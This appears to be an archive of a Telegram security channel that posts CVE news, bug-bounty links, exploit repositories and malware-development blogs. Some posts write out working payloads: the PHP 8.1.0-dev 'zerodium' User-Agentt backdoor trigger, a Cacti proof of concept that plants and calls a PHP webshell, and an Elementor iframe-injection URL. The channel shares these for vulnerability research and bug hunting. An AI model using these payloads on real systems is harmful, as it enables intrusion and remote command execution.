996
Подписчики
Нет данных24 часа
Нет данных7 дней
Нет данных30 дней
Архив постов
996
💥 PHP 8.1.0-dev then try RCE & SQLi
🔴Try : User-Agentt: zerodiumsleep(5);
🔴Try : User-Agentt: zerodiumsystem('id');
⛔#BugBounty , #Hunting
📱@APTANALYSIS
996
📝CVE-2023-27470 : Deleting Your Way Into SYSTEM: Why Arbitrary File Deletion Vulnerabilities Matter
➡️Blog : https://www.mandiant.com/resources/blog/arbitrary-file-deletion-vulnerabilities
⛔#LPE , #Windows , #Access , #Analysis
📱@APTANALYSIS
996
💰Account takeover for $3000
👍Link : https://doepichack.com/account-takeover-for-3000/
⛔#BugBounty , #Hunting
📱@APTANALYSIS
996
☝️AD Attack and Defense - Domain User HashDump Tracking
⚡️Blog : https://www.freebuf.com/articles/network/362363.html
⛔#Hash_dump , #Mimikatz , #ADSecurity
📱@APTANALYSIS
996
⭐️ CVE-2022-4953 : Elementor < 3.5.5 - Iframe Injection
✅Wp : https://wpscan.com/vulnerability/8273357e-f9e1-44bc-8082-8faab838eda7
✅EDB : https://www.exploit-db.com/exploits/51716
{
Proof of Concept ::
https://vulnerable-site.tld/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwczovL2Rvd25sb2FkbW9yZXJhbS5jb20vIn0K
}
⛔#Exploit , #EDB , #POC , #Vulnerability , #Elementor , #Hunting
📱@APTANALYSIS996
🔥CVE-2023-31132 : Privilege escalation when Cacti < 1.2.25 installed using Windows Installer defaults
PS C:\Users\user1> echo '<?php system($_SERVER[''HTTP_X_CMD'']);?>' | Out-File -Encoding utf8 C:\Apache24\htdocs\cacti\webshell.php
——
PS C:\Users\user1> eNTER
——
PS C:\Users\user1> Invoke-WebRequest -UseBasicParsing -Headers @{'x-cmd'='whoami'} -Uri http://localhost/cacti/webshell.php | select -ExpandProperty Content
|— nt authority\system
🟥Refrence : https://github.com/Cacti/cacti/security/advisories/GHSA-rf5w-pq3f-9876
⛔#POC , #Exploit , #Cacti , #Vulnerability
📱@APTANALYSIS996
🔥🔥🔥Iran Ethical Hackers 2016 (Lab)
🦋 By : ALI 0P3N3R
🦋 Sp Thanks : Alireza
🐈⬛Vulnerability training Sql injection GET method
🐈⬛Sql injection POST method vulnerability tutorial
🐈⬛Authentication bypass vulnerability training
🐈⬛SQL injection vulnerability in the user agent header
🐈⬛XSS vulnerability training of reflected type and get method
🐈⬛XSS vulnerability training of reflected type and post method
🐈⬛XSS vulnerability training of stored type and get method
🐈⬛Learning xss vulnerability of stored type and post method
🐈⬛Teaching the xss vulnerability in the user agent header, the first method
🐈⬛Teaching the xss vulnerability in the user agent header of the second method
🐈⬛Teaching xss vulnerability in http referrer header
🐈⬛Teaching the vulnerability of os command injection
🐈⬛SSI vulnerability training
🐈⬛SSTI Vulnerability Training
🐈⬛LFI vulnerability training
🐈⬛RFI Vulnerability Training
🐈⬛Unvalidated File Upload vulnerability training
🐈⬛Unvalidated redirects and forwards vulnerability training
🐈⬛Vulnerability training insecure direct object references
🐈⬛SSRF vulnerability training
🐈⬛CSRF Vulnerability Training
🐈⬛Training to bypass the addslashes function in sql injection attacks
🐈⬛Training to bypass addslashes in xss attacks
🐈⬛Learning to bypass the mysql_real_scape_string function in sql injection attacks
🐈⬛HTML injection vulnerability tutorial
⭐️Password : @APTIRAN
📱@APTANALYSIS
996
🖤There are 2 months left of 3 months of private channel subscription.
⚖️Note: Permanent membership users are included.
996
💥💥💥CVE-2023-4528: Java Deserialization Vulnerability in JSCAPE MFT (Fixed)
⚠️Java : https://www.rapid7.com/blog/post/2023/09/07/cve-2023-4528-java-deserialization-vulnerability-in-jscape-mft-fixed/
Executing :
java.lang.Runtime.getRuntime().exec("...shell command...");
💥💥💥Metasploit Weekly Wrap-Up
Metasploit : https://www.rapid7.com/blog/post/2023/09/01/metasploit-weekly-wrap-up-25/
CVE-2023-34468 : exploit/linux/http/apache_nifi_h2_rce (https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/apache_nifi_h2_rce.rb
⛔#Vulnerability_Disclosure , #Discovers , #Rapid7 , #Module , #Vulnerability , #Metasploit , #CVE , #Exploit
📱@APTANALYSIS996
👑Qualys Top 20 Most Exploited Vulnerabilities
The earlier blog posts showcased an overview of the vulnerability threat landscape that is either remotely exploited or most targeted by attackers. A quick recap – We focused on high-risk vulnerabilities that can be remotely exploited with or without authentication, and with the view on the time to CISA being down to 8 days, the most vulnerabilities targeted by threat actors, malware & ransomware.
This blog post will focus on Qualys’ Top Twenty Vulnerabilities, targeted by threat actors, malware, and ransomware, with recent trending/sightings observed in the last few years and the current year.
Some of these vulnerabilities are part of the recent CISA Joint Cybersecurity Advisory (CSA), published on August 3, 2023; you can access it from 2022 Top Routinely Exploited Vulnerabilities.
🔗Blog : https://blog.qualys.com/vulnerabilities-threat-research/2023/09/04/qualys-top-20-exploited-vulnerabilities
⛔#Vulnerability ,#CVE , #Top , #Exploited , #TOP_20_CVE
📱@APTANALYSIS996
🔴Paranoids Vulnerability Research - Ivanti Issues Security Alert
💥CVE-2023-28323: Unsafe Deserialization Leading to RCE
💥CVE-2023-28324: Insufficient Client Validation Leading to Privilege Escalation
💥CVE-2023-38343: XXE Leading to File Disclosure and SSRF
💥CVE-2023-38344: Authenticated Arbitrary File Read
⭐️Link : https://www.yahooinc.com/paranoids/paranoids-vulnerability-research-ivanti-issues-security-alert
⛔#Alert , #POC , #Analysis , #Vulnerability ,#CVE
📱@APTANALYSIS
996
⚪️Boot Unguarded: x86 Trust Anchor Downfalls to The Leaked OEM Internal Tools and Signing Keys
⭐️Link : https://hardenedlinux.org/blog/2023-09-07-boot-unguarded-x86-trust-anchor-downfalls-to-the-leaked-oem-internal-tools-and-signing-keys/
❤@APTANALYSIS
996
🟥Understanding Red to Be Better at Blue: Navigating New CrackMapExec Updates
🔸Blog : https://kostas-ts.medium.com/understanding-red-to-be-better-at-blue-navigating-new-crackmapexec-updates-c27b46965578
⛔#Detection_Engineering , #Information_Security , #Threat_Hunting , #PurpleTeaming , #RedTeam
❤@APTANALYSIS
996
😊CVE-2023-36812 , CVE-2023-25826 : OpenTSDB <= 2.4.1 - Command injection
🌙Exp : https://github.com/ErikWynter/opentsdb_key_cmd_injection
⛔#Exploit
❤@APTANALYSIS
996
🖥Numerous and instructive vulnerabilities
🔗CVE-2023-31465 - Reomote Command Execution in TimeKeeper v. 8.0.17-8.0.27 PoC
🔗CVE-2023-31466 - Stored Cross-Site Scripting in TimeKeeper v. 8.0.17-8.0.27 PoC
🔗CVE-2023-39558 - Reflected Cross-Site Scripting in AudimexEE v.15.0 PoC
🔗CVE-2023-39559 - Full Path Disclosure in AudimexEE v15.0 PoC
🔗CVE-2023-41635 - XML External Entity injection in RealGimm by GruppoSCAI PoC
🔗CVE-2023-41636 - SQL injection in RealGimm by GruppoSCAI PoC
🔗CVE-2023-41637 - Stored cross-site scripting in RealGimm by GruppoSCAI PoC
🔗CVE-2023-41638 - RCE via Unrestricted file upload in RealGimm by GruppoSCAI PoC
🔗CVE-2023-41640 - Information disclosure in RealGimm by GruppoSCAI PoC
🔗CVE-2023-41642 - Reflected cross-site scripting in RealGimm by GruppoSCAI PoC
⛔#Exploit , #POC , #Analysis , #Vulnerability ,#CVE , #multiple
❤@APTANALYSIS
996
👩💻 Windows 12 web version, online experience Click on the link below to experience online
😍 Web : https://tjy-gitnub.github.io/win12/desktop.html
☕️ Repo : https://github.com/tjy-gitnub/win12
⛔#Web_Tools , #Windows_12
❤@APTANALYSIS
996
⭐️CVE-2023-38490 : Kirby < 3.9.6 XML External Entity (XXE)
⭐️POC : https://github.com/Acceis/exploit-CVE-2023-38490
➡️Blog : https://www.acceis.fr/kirby-3-9-6-xml-external-entity-xxe-vulnerability-cve-2023-38490
⛔#Exploit , #POC , #Analysis , #Vulnerability
❤@APTANALYSIS
996
🐱Lord Of The Ring0
⭐️https://idov31.github.io/2022/07/14/lord-of-the-ring0-p1.html
⭐️https://idov31.github.io/2022/08/04/lord-of-the-ring0-p2.html
⭐️https://idov31.github.io/2022/10/30/lord-of-the-ring0-p3.html
⭐️https://idov31.github.io/2023/02/24/lord-of-the-ring0-p4.html
⭐️https://idov31.github.io/2023/07/19/lord-of-the-ring0-p5.html
⛔#C++ , #windows , #kernel , #Malware_dev
❤@APTANALYSIS
